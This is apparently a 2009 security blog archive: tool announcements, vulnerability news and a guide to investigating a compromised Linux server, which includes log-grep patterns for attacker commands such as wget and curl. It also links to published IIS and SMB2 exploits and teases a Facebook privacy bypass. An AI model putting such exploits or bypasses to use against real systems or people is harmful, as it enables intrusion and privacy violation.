DiskDigger is a tool that allows you to recover deleted files off of a FAT or NTFS drive. It has two modes of operation: In the first it merely looks in the FAT/MFT to find files marked as deleted, in much the same way that the tool called Restoration does. In the 2nd mode it does a file carve down the drive looking at the raw bits and finding the know headers and footers of various file types, much like PhotoRec. While PhotoRec seems a little more powerful, DiskDigger is easier to use and its preview functionality is quite nice. This video will cover the basics of recovering deleted files with DiskDigger.

See this video:
http://www.irongeek.com/videos/file-carving-and-file-recovery-with-diskdigger.swf

Saturday, October 03, 2009

FOSS.my 2009 (24-25 October 2009)

FOSS.my 2009 is Malaysia’s premier Free and Open Source Software (FOSS) event. FOSS.my 2009 is our second such conference, we aim for this to be an annual event bringing together professionals and enthusiasts from Malaysia, Singapore, Asia and the rest of the world for a two day grassroots driven FOSS conference.
http://foss.my/2009/schedule/

Monday, September 14, 2009

NSMnow – 1.5.0

NSMnow 1.5 series sees the initial completed feature set for Fedora, RHEL and CentOS systems. This is excellent news for those who have wanted to have, use, test an NSM configuration for themselves but were daunted by the process of doing from scratch.

With this being initial release for support to Fedora, RHEL, and CentOS systems there is bound to be some teething problems. So as long as you submit the bug reports, we will fix them and NSMnow will continue to get even better, if that’s possible.

Download:http://www.securixlive.com/nsmnow/download.php

iPhone anti-phishing sigs only slightly delayed

A number of security experts initially criticized Apple's latest security feature for the iPhone, only to find -- 24 hours later -- that the issues were mostly moot.

On Thursday, Apple highlighted the anti-phishing features of its popular mobile device, the iPhone, at a San Francisco product launch event. However, several security experts tested the feature only to find that phishing sites blocked by Safari were still loaded by the iPhone's mobile browser. Yet, by Friday, the issue appeared to have been mostly been fixed.

It's likely that the lists of sites to be blocked had to be updated by Apple, and that took time, said Michael Sutton, vice president of security research for Web security firm Zscaler.

"Over time, more sites are being blocked," Sutton said. "The issue is likely not the blocking, but the updates."

On Saturday, Apple confirmed that updates to the iPhone are not necessarily in real time.

"Safari's anti-phishing database is downloaded while the user charges their phone in order to protect battery life and ensure there aren't any additional data fees," the company said in a statement sent to SecurityFocus. "After updating to iPhone OS 3.1 the user should launch Safari, connect to a Wi-Fi network and charge their iPhone with the screen off. For most users this process should happen automatically when they charge their phone."

Sutton commended Apple for its attention to security on the iPhone.

"If you look at mobile phones, they have very little security," he said. "So it's good that Apple has taken this step."

From:SecurityFocus

Sunday, September 13, 2009

Hack In The Box Security Conference 2009 - Malaysia

Date: 5-8 October 2009
Venue:Crowne Plaza Mutiara Kuala Lumpur,Jalan Sultan Ismail,50250 Kuala Lumpur

HITBSecConf is the premier network security event in Asia and the Middle East. The main aim of our conference is to enable the dissemination, discussion and sharing of deep knowledge network security information.

You can see details here:
http://conference.hitb.org/hitbsecconf2009kl/

Thursday, September 10, 2009

Hackers already exploiting IIS flaws

Microsoft has revealed that hackers are already exploiting newly disclosed vulnerabilities in its Internet Information Services (IIS) web server software.

Exploit code for the first flaw was posted on Monday, allowing hackers to remotely take control of an IIS 5.0 server. New code was then posted on Thursday which takes advantage of vulnerabilities in IIS 5.0, IIS 5.1, IIS 6.0 and IIS 7.0 to allow hackers to launch denial-of-service attacks against these systems, as long as they are running the FTP Service, said Microsoft.

The company was forced to update its security advisory warning that it is now seeing "limited attacks that use this exploit code".

"Microsoft is actively monitoring this situation to keep customers informed and to provide guidance as necessary," the advisory continued.

Microsoft is due to release its September security updates on Tuesday next week, but it is widely believed that the new vulnerabilities were disclosed too recently for the Microsoft security team to deliver a working fix.

Microsoft blamed the current, albeit limited, attacks on the fact that the original vulnerabilities were published on the internet before the firm had a chance to work on a resolution.

"We continue to encourage responsible disclosure of vulnerabilities. We believe the commonly accepted practice of reporting vulnerabilities directly to a vendor serves everyone's best interests," said the firm in a blog post.

"This practice helps to ensure that customers receive comprehensive, high-quality updates for security vulnerabilities without exposure to malicious attackers while the update is being developed."

How to Investigate a compromised Linux Server

This article will assist you with a preliminary investigation of a server compromise. If the server appears to have been compromised at the root level, the server is to be considered compromised until it is rebuilt. This is not to say that you have to rebuild just because an intruder gained access to an un-privileged account. You must identify how the server was compromised, so you can patch those areas.

Note: Don't get distracted with what you find, focus on gathering as much information as possible before disturbing the environment
Identify Who is on the Server

Look for suspicious logins. If the customer always logs in from a DSL line in California and then suddenly logs in from Japan, you may want to make note of that.

#w && echo "netstat listing" && netstat -nalp |grep ":22 "
#last -a
#zgrep ssh /var/log/secure* |grep Accept
#zgrep ftp /var/log/secure* |grep Accept


Identify current network activity:
#netstat -nalp

View IP Connection Count
The following command will tell you how many connections are being made to the webserver on port 80.
Replacing :80 , with the port of your application will allow you to see the number of connections associated with any service. If you are using IPv6, replace cut -f1 -d: with cut -f4 -d:
#netstat -plant | awk '$4 ~ /:80$/ {print $5}' | \
#cut -f1 -d: | \
#sort | uniq -c | sort -n
1 0.0.0.0
1 127.0.0.1
1 149.254.192.205
1 151.65.171.19
1 165.155.200.87
1 173.66.139.70
1 195.93.21.97
1 60.48.171.251
1 60.53.227.174
1 72.30.142.83
1 75.101.147.30
1 79.7.248.51
1 82.206.136.38
1 83.229.112.20
1 96.231.93.237
2 202.133.102.242
2 41.210.38.158
2 86.16.94.89
3 208.54.94.9
5 41.210.17.188
5 41.210.35.165
5 66.150.96.121
5 83.87.69.25
9 68.191.207.0
11 65.49.2.92


What is the state of the current connections?
#netstat -plant | \
#awk '/^tcp/ {print $6}' | sort | uniq -c | sort -n
13 FIN_WAIT2
53 LISTEN
129 TIME_WAIT
316 ESTABLISHED
754 CLOSE_WAIT


Type, and process name:
#netstat -plant | \
#awk ' /^tcp/ {split($7, a, "/"); print $6, a[2]}' | \
#sort | uniq -c | sort -n| tail
1 LISTEN xinetd
2 LISTEN memcached
2 LISTEN slapd
2 LISTEN smbd
2 TIME_WAIT
3 LISTEN httpd
3 SYN_SENT firefox
9 ESTABLISHED httpd
11 ESTABLISHED firefox
46 ESTABLISHED slapd


List Open Files
In Linux everything is a file, including network connections:
#lsof -i -n

To view the numeral port number, as opposed to the service name
#lsof -nPi

What Processes are Running?
#ps -elf
#ls /proc/*/exe -la


Unhide
Sometimes process will hide them selves well enough that our shell scripts aren't gonna pick up the process. In these instances I use unhide:
http://www.security-projects.com/?Unhide
Compile Unhide:
$ wget http://www.security-projects.com/unhide20080519.tgz
$ tar xzf unhide20080519.tgz
$ cd unhide-20080519/
$ cc unhide-tcp.c -o unhide-tcp
$ chmod o+x unhide-tcp
$ cc unhide-linux26.c -o unhide
$ chmod o+x unhide
$ mv unhide* /usr/sbin

Using Unhide:
$ unhide-tcp
Unhide 20080519
yjesus@security-projects.com

Starting TCP checking

Starting UDP checking

$ unhide proc
Unhide 20080519
yjesus@security-projects.com

[*]Searching for Hidden processes through /proc scanning

Found HIDDEN PID: 740
Command:

Found HIDDEN PID: 775
Command:

Found HIDDEN PID: 1004
Command:

Found HIDDEN PID: 2996
Command:

Found HIDDEN PID: 26921
Command: ./123qwelb

Found HIDDEN PID: 27109
Command: ./123qwelb

Found HIDDEN PID: 27213
Command: ./123qwelb

Found HIDDEN PID: 27216
Command: ./123qwelb

Found HIDDEN PID: 27284
Command: top



Check Binary Files

Often times malicious users will replace system binaries with modified copies which will leave back-doors for the attacker to use in the event that the original vector of attack is corrected.

You can use the command strings to view the text data in a binary file. As such you can use this as a way to determine if a binary has been modified in any way.

Compare the output of the following command with that of a known good server:
#strings /usr/bin/top

Investigate Process Activity

Wanna see what a process is doing? Run the following command replacing $PID with the actual process id:
#strace -p $PID

DESCRIPTION

In the simplest case strace runs the specified command until it exits. It intercepts and records the system calls which are called by a process and the signals which are received by a process. The name of each system call, its arguments and its return value are printed on standard error or to the file specified with the -o option.

The -p flag allows you to attach strace to an already running process.
Suspicious Files

Are suspicious files located in the world writeable directories?

The next thing you want to look at are the directories that are world writeable. More often than not, the intruder is not a hacker at all, but a worm that is spreading through the internet. Many attacks will store a binary or will leave behind other temporary files. The three most common directories to search in are /tmp, /var/tmp, and /dev/shm.

#ls /tmp -lab
#ls /var/tmp -lab
#ls /dev/shm -lab

Many times you will find that the worm/intruder will try to hide subdirectories in ways that make it hard to find how to enter the directory. Using the tab key for the auto-complete often helps. Here are some examples of what to look for:
root:~# ls -la
total 2
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32
drwxr-xr-x 5 nobody nobody 120 2005-11-25 18:32 .
drwxr-xr-x 33 nobody nobody 2320 2005-11-25 18:31 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:32 ..
drwxr-xr-x 2 nobody nobody 48 2005-11-25 18:31 ...

Point(s) of Entry

Simply cleaning a server will not prevent a future compromise. We need to help the customer identify the point of entry to protect the customer, and our network.

Many times vulnerable web scripts (php, perl, etc) are exploited and commands are then executed on the server as the web user. We are going to want to use grep to search the apache logs for some common commands that are often used by intruders.

You will want to use different commands depending on what control panel software the server is running

No control panel
for i in `locate access_log` ;
do
echo $i ; egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' $i ;
done

You may have to look in the customer's VirtualHost container to ascertain the real name of the log file.

cPanel
The following code will check if any system functions were called using the webserver:
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /usr/local/apache/logs/*
The next command searches for XSS vulnerabilities (with the added benefit of searching for positive HTTP status codes):
awk '$7 ~ /http/ {print}' /usr/local/apache/domlogs/*/access_log | awk '$9 ~ /[2-3]/ {print}'

Ensim
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20'/home/virtual/site*/fst/var/log/httpd/*

Plesk
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/*/statistics/logs/*

On servers with a large number of sites, running the previous command will give you an argument list too long error. Try this instead:
for i in `ls /var/www/vhosts`; do
egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/www/vhosts/$i/statistics/logs/access_*log 2/dev/null;
done;


egrep -i '(chr\(|system\()|(wget|curl|perl|gcc|chmod)%20' /var/log/httpd/*


To locate XSS vulnerabilities try:
awk '$7 ~ /http/ {print}' /var/www/vhosts/*/statistics/logs/access_*log | awk '$9 ~ /[2-3]/ {print}'

This command searches the URI string for the text http. URIs with a protocol identifier in them often times indicate a XSS attack. However some applications such as WordPress, among others, can result in false positives. Additionally this command will only return results for requests with a positive reply code, indicating a successful request to the web server.

Reminders
Keep in mind that not all results mean the server has been compromised, it takes some interpreting. You want to look for obvious things such as calls to wget to download a file, or a call to perl that looks out of place. You may come up with some false positives so using grep to cut 404's and 400's out may be a good idea. You can do this by tacking a "| grep -v 404" on to the end of any of those commands.

Document all of your findings!
Wrap Up

Root Compromise
If you determine that an attacker has gained root access you will need to contact your sales representative, to have a replacement server built. There is no way for you to guarantee that a server will be 100% safe after a root compromise.

Ideally you should upload your sites to the new server from a local backup, however we can attempt to clean up the sites as best you can if local backups are not available.

User Compromise
If your investigation determines that the server was not compromised at the root level, then it should be safe to remove the compromised files, if any, and inform the customer of your findings, along with recommendations to prevent this issue from recurring.

From: http://neranjara.org/article/title/How_to_Investigate_a_compromised_Linux_Server

Wednesday, September 09, 2009

Vista/2008/Windows 7 SMB2 BSOD 0Day

This vulnerability affecting Microsoft SMB2 can be remotely crashed with proof-of-concept code that has been published.This vulnerability affects Windows 7/Vista/Server 2008. The exploit needs no authentication, only file sharing enabled with one 1 packet to create a BSOD. We recommend filtering access to port TCP 445 with a firewall.

More details, http://milw0rm.com/exploits/9594

Friday, September 04, 2009

Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service

There is a DoS vulnerability in the globbing functionality of IIS FTPD.
Anonymous users can exploit this if they have read access to a directory!!!
Normal users can exploit this too if they can read a directory.

This is the steps how to exploit it:
http://www.milw0rm.com/exploits/9587

fimap-A little tool for local and remote file inclusion auditing and exploitation

fimap is a little python tool which can find, prepare, scan, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection. It's is currently under heavy development but it's usable.

fimap is currently under development but still usable. Feel free to test it!
This document and tool is not recommend for people who doesn't know what LFI/RFI is.
If you know what it is, it might be a handy tool for you.

You can download it here:
http://code.google.com/p/fimap/downloads/list

Monday, August 31, 2009

Indonesian Hackers Launch Independence Day Attack on Malaysian Web Sites

A ring of Indonesian hackers on Monday claimed to have attacked a list of more than 120 Web sites as retribution for Malaysia’s alleged theft of Indonesian cultural items and abuse of migrant workers.

A statement was posted on a Blogspot blog titled "Terselubung" saying that a number of Malaysian Web sites had been hacked and defaced to “celebrate” Malaysia’s Independence Day, which fell on Monday August 31.

“Today, August 31, 2009, an uncreative country, a country who likes to steal Indonesian culture, a country whose citizen is the mastermind of bombings in Indonesia, a country who has tortured many of our sisters — the migrant workers who worked there, a country who abused our national anthem, a country who harassed Indonesia on the Internet, a country that has stolen Sipadan and Ligitan islands, a country which has trespassed our water illegally, a country which received their independence from Britain, is celebrating its anniversary,” the Web site stated.

From HITB website

If you want to see original article from Terselubung blog is here:
http://terselubung.blogspot.com/2009/08/perang-online-dengan-malaysia-di-mulai.html

Friday, August 28, 2009

DNSenum

DNSenum is a pentesting cool created to enumerate DNS info about domains.
The purpose of Dnsenum is to gather as much information as possible about a domain. The program currently performs the following operations:

1) Get the host's addresse (A record).
2) Get the namservers (threaded).
3) Get the MX record (threaded).
4) Perform axfr queries on nameservers (threaded).
5) Get extra names and subdomains via google scraping (google query = "allinurl: -www site:domain").
6) Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).
7) Calculate C class domain network ranges and perform whois queries on them (threaded).
8) Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).
9) Write to domain_ips.txt file ip-blocks.

Thursday, August 27, 2009

Hacking Exposed:Network Security Secrets and Solutions

I'm still reading this Hacking Exposed 6th Edition book. I hope i will finish this week.
Hacking Exposed established this entire genre of books. Now in its 6th (and 10th anniversary) edition, and having sold millions of copies throughout the world, the book remains the #1 best-selling computer security book in the world and it is still just as useful and valuable as it ever was. Kurtz, McClure, and Scambray have once again update this highly resected title to include the latest and greatest in attacks and exploits, as well as the cutting edge countermeasures and security controls you can implement to protect your PC or your network.
New and updated material:

-New chapter on hacking hardware, including lock bumping, access card cloning, RFID hacks, USB U3 exploits, and Bluetooth device hijacking
-Updated Windows attacks and countermeasures, including new Vista and Server 2008 vulnerabilities and Metasploit exploits
-The latest UNIX Trojan and rootkit techniques and dangling pointer and input validation exploits
-New wireless and RFID security tools, including multilayered encryption and gateways
-All-new tracerouting and eavesdropping techniques used to target network hardware and Cisco devices
-Updated DoS, man-in-the-middle, DNS poisoning, and buffer overflow coverage
-VPN and VoIP exploits, including Google and TFTP tricks, SIP flooding, and IPsec hacking
-Fully updated chapters on hacking the Internet user, web hacking, and securing code

Table of contents

Part I: Casing the Establishment
Chapter 1. Footprinting
Chapter 2. Scanning
Chapter 3. Enumeration
Part II: System Hacking
Chapter 4. Hacking Windows
Chapter 5. Hacking Unix
Part III: Infrastructure Hacking
Chapter 6. Remote Connectivityand VoIP Hacking
Chapter 7. Network Devices
Chapter 8. Wireless Hacking
Chapter 9. Hacking Hardware
Part IV: Application and Data Hacking
Chapter 10. Hacking Code
Chapter 11. Web Hacking
Chapter 12. Hacking the Internet User
Part V: Appendixes
Appendix A. Ports
Appendix B. Top 14 Security Vulnerabilities
Appendix C. Denial of Service (DoS) and Distributed Denial of Service (DDoS) Attacks
Index

Auto SQL injection co-opts thousands of sites

An automated attack using SQL injection has compromised tens of thousands of Web pages with code that tries to upload a data-stealing Trojan horse program to visitors' computers, security firm ScanSafe said last week.

The attack, which had inserted iframe scripts into as many as 130,000 Web pages as of Tuesday, uses the compromised pages to attempt to infect visitors with a backdoor Trojan horse that includes keylogging and download functionality, Mary Landesman, senior security researcher for ScanSafe, said in an e-mail interview on Tuesday. The initial Web site compromises appear to have been accomplished through an automated database injection attack, which matches with a trend seen by Landesman and others.

"SQL injection attacks are the most commonly observed compromise vector," Landesman stated. "Web attacks have been growing at the rate of 1 percent per day over the past year, with over half of all observed attacks the result of SQL injection."

Web attacks using SQL injection have become a lot more popular in recent years. Last week, a federal indictment of an alleged data thief stated that all five corporate victims -- including Heartland Payment Systems and Hannaford Bros. -- had initially been compromised through an SQL injection attack. In 2008, about 20 percent of the 5,600 vulnerabilities entered into the National Vulnerability Database were related to SQL injection, according to the service's statistics page.

In the latest spate of attacks, the Trojan horse programs downloaded to compromised computers are poorly recognized by most security software, Landesman said.

"Signature detection ranges, with a high of roughly 50 percent of signature vendors detecting some of the malware and a low of less than 10 percent," she said. "The attackers are continually swapping domains, using multiple exploits, and swapping out the eventual malware binaries to ensure low detection rates from signature-based technologies."

This article from Securityfocus.com

Friday, July 31, 2009

New security site ... http://triviasecurity.net

http://triviasecurity.net

My friends and I will launch this Trivia Security site next week...I hope you all can participate in this forum ....

http://triviasecurity.net


About Trivia Security:
Trivia Security was born in early 2003 with one goal to make it easier for the whole world and have everything under one site instead of spending hours searching. It was started by FreakXL as DerekDan joined the development process of Trivia Security at Lycos servers and as the development was near to finish in May of 2003 Trivia was moved to new server and a domain `triviasecurity.com` by DerekDan and now `triviasecurity.net`. aMado joined the Trivia Team and has contributed allot in the finishing stages. Without aMado Trivia Security wont be where it is right now.

Monday, July 27, 2009

Fuzzgrind

Fuzzgrind is a fully automatic fuzzing tool, generating test files with the purpose of discovering new execution paths likely to trigger bugs and potentially vulnerabilities.

It is based on the concept of symbolic execution. Thus, the tool starts from a file considered valid by the software under test, and analyses the execution path to extract any constraints tied to branch instructions followed by this software. By resolving constraints one by one, Fuzzgrind will alter the valid file to explore possible new branches of the software under test, in order to discover new vulnerabilities.

Fuzzgrind is licensed under the terms of the GNU GPL. Anybody is welcome to contribute!

Tuesday, March 24, 2009

FastTrack- Easier Penetration Testing Tool

Every IT professional,security engineer, security analyst and penetration tester are always looking for easier ways to perform penetration tests. I found this Fast-Track tool.

What is Fast-Track?
"Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when I was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some of my advanced attacks and propagate it down to my team at SecureState, I ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride. "

I tried one of the powerful tool in Fast-Track, The SQLPwnage.
"This tool scans subnets looking for web servers. After found, it automatically starts to crawl the site looking or post parameters. Once a list of post parameters have been identified, Fast-Track will either try blind SQL injection or error based SQL injection and attempt to automatically exploit the system for you. If successful, whatever payload you specified will be delivered to you, this could be meterpreter, reverse shell, bind shell, reverse vnc, and much more. SQLPwnage will automatically re-enable xp cmdshell if disabled, try to elevate permissions, and use the hex to binary bypass explained in the SQL bruter section to deliver our payloads."

You can see this Video how to use SQLPwnage.

Metasploit 3.2

The Metasploit Framework is a development platform for creating security tools and exploits. It's used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide.

Compare to Metasploit 3.0, in Metasploit 3.2, getting attack code onto a target machine will also be easier on Metasploit 3.2 with improvements to the Raw Packet Tools function. A new library call PacketFu is expected by Moore to achieve packet injection for both wired and wireless end points.It also provides improved support for exploiting multi-core CPU machines, which had been more difficult to attack with previous versions of Metasploit.

Metasploit is also able to take exploit code and weaponize it in an .EXE (executable file) that can be deployed by an attacker. Moore said the EXE template that created EXE attacks has been improved in Metasploit 3.2 in order to defeat AntiVirus vendor signature detection.

If you never try metasploit, you can download it here.

Saturday, February 28, 2009

SecurixNSM 1.3

Securix-NSM is the successor of Knoppix-NSM. It's an extension of our NSMnow technology which has been integrated with the universal Debian foundation with a range of other tools to work from. Like it's predecessor Securix-NSM is dedicated to providing a framework for individuals wanting to learn about Network Security Monitoring (NSM) or who want to quickly and reliably deploy a NSM capability in their network.

Securix-NSM is now based on Debian Live, which means that you can test all the tools in a live Debian session running on the CD without the need for a HardDisk Drive (HDD) installation.

You can download ISO here.

Monday, February 16, 2009

Enjoy your Facebook!!!

Alright so here’s how to get into anyone’s tagged photos even if they are private for you.

The only restriction is that they have to actually have tagged photos, either tagged by others or tagged by themselves. You can only see the last 20 tagged photos by others and 20 tagged photos of themselves before an error pops up.

If you want to see the steps, here .



Saturday, February 07, 2009

Howto: Installing Squid Proxy in pfSense

Setup a Squid Transparent Proxy using pfSense

What is Pfsense?
pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.

What is Squid?
Squid is a proxy server and web cache daemon. It has a wide variety of uses, from speeding up a web server by caching repeated requests, to caching web, DNS and other computer network lookups for a group of people sharing network resources, to aiding security by filtering traffic.

Tutorial:

This howto describes how to install and configure Squid using pfSense.
1.Firstly, you need to install pfSense. See documentation here.
2.After you have installed pfSense, you need to access pfSense webGUI using your Pfsense IP address, e.g: http://192.168.1.4/ . Enter username and password for your pfSense webGUI and you should see this window (Status -> System). This is where we start.
3.Now go to the System tab and choose the Packages. Scroll down to the squid package and then you can install by clicking + (Add) button on the right of that package.
4.Now, you are installing Squid package into your pfSense.After installation finished, you can start configuring your Squid proxy server.
5.Now, go to Services -> Proxy server tab. After that, it will show you General Setting tab for Squid. You need to set Proxy interface, Allow users on interface, Transparent Proxy, Log store directory, Proxy port and other settings. Hit the Save button at the end of the page to save your proxy setting.
6.Then, go to Cache Management tab. You need to set Hard disk cache size, Hard disk cache location, Memory cache size, Minimum object size, Maximum object size, and other setting that you want to set. Hit the Save button.
7.Lastly, you need to set Access Control for Proxy server. Hit Save button to save configuration.
8.Now, you have finished installing and configuring Squid transparent proxy using pfSense. Your Squid proxy server is ready to be used.


Setup a VideoCache on pfSense

This howto covers the process of installing videocache on pfSense. Now, you have already installed Squid proxy on pfSense.
1.Firstly, you need to install Python.
•Use Shell terminal or ssh to PFsense and use the following command:
# pkg_add -r python
•Install the additional needed libraries.
# pkg_add -r py25-bsddb
# pkg_add -r py25-gdbm
# pkg_add -r py25-sqlite3
# pkg_add -r py25-tkinter


2.After that, install URLGrabber.
•Download the latest version of urlgrabber from URLGrabber Download Archive.
# fetch http:/linux.duke.edu/projects/urlgrabber/download/urlgrabber-x.x.x.tar.gz
# tar -xzf urlgrabber-x.x.x.tar.gz
# cd urlgrabber-x.x.x
# python setup.py bdist_rpm
# python setup.py install


3.Then, install Iniparse.
Download the latest version of python-iniparse from Iniparse Project Website.
# fetch http:/iniparse.googlecode.com/files/iniparse-x.x.x.tar.gz
# tar -xzf iniparse-x.x.x.tar.gz
# cd iniparse-x.x.x
# python setup.py bdist_rpm
# python setup.py install


4.Then, install VideoCache.
# fetch http:/cachevideos.com/sites/default/files/pub/videocache/videocache
/x.x.tar.gz
# tar -xvzf videocache-x.x.tar.gz
# python setup.py install


5.Configure VideoCache
•Using VI edit the /etc/videocache.conf file and edit the following options in the
file.
-proxy: Set the IP address and port on which squid is listening on PFsense.
-cache_host: The IP address of PFsense.
6.Configure Squid
Now add the following lines to /usr/local/pkg/squid.inc after acl.

# --BEGIN-- videocache config for squid
url_rewrite_program /usr/bin/python /usr/share/videocache/videocache.py
url_rewrite_children 10
acl videocache_allow_url url_regex -i \.youtube\.com\/get_video
acl videocache_allow_url url_regex -i \.cache[a-z0-9]?[a-z0-9]?[a-z0-9]?
\.googlevideo\.com\/videoplayback
acl videocache_allow_url url_regex -i \.cache[a-z0-9]?[a-z0-9]?[a-z0-9]?
\.googlevideo\.com\/get_video
acl videocache_allow_url url_regex -i proxy\-[0-9][0-9]\.dailymotion\.com\/
acl videocache_allow_url url_regex -i [a-z0-9][0-9a-z][0-9a-z]?[0-9a-z]?[0-9a-
z]?\.xtube\.com\/(.*)flv
acl videocache_allow_url url_regex -i bitcast\.vimeo\.com\/vimeo\/videos\/
acl videocache_allow_url url_regex -i va\.wrzuta\.pl\/wa[0-9][0-9][0-9][0-9]?
acl videocache_allow_url url_regex -i \.files\.youporn\.com\/(.*)\/flv\/
acl videocache_allow_url url_regex -i \.msn\.com\.edgesuite\.net\/(.*)\.flv
acl videocache_allow_dom dstdomain v.mccont.com vp.video.google.com dl.redtube.com
acl videocache_deny_url url_regex -i http:\/\/[a-z][a-z]\.youtube\.com http:\/
\/www\.youtube\.com
url_rewrite_access deny videocache_deny_url
url_rewrite_access allow videocache_allow_url
url_rewrite_access allow videocache_allow_dom
redirector_bypass on
# --END-- videocache config for squid


• Save and restart squid service and you have videocache running on your PFsense.
P/s: You need to disable the https option in the General Setup Settings.

Thursday, January 22, 2009

Time and Attack Mapper (TA-Mapper)

Time and Attack Mapper (alternatively known as TA-Mapper) is an effort estimator tool for blackbox security assessment (or Penetration Testing) of applications. This tool provides more accurate estimation when compared to rough estimation. Penetration testers who always has hard time explaining/justifying the efforts charged (or quoted) to their customers can find this tool handy by able to calculate efforts with greater accuracy required for application penetration testing. In addition, this tool helps application pen-testers in itemizing their penetration testing efforts into micro-level and provides more clarity of their pen-testing activities. In future I have plans to extend this tool ability to generate test cases.

More information, go to http://www.hackerscenter.com/

Wednesday, January 21, 2009

NSMnow 1.3

NSMnow is all about building an Network Security Monitoring (NSM) framework . It's very fast and easy without the messy patching and configuration of each tool needed to get the system up and running. It is build a sguil system with the minimum amount of fuss so you can actually focus on using sguil instead of building it.
More details, see this site: http://www.securixlive.com/
If you want to download: here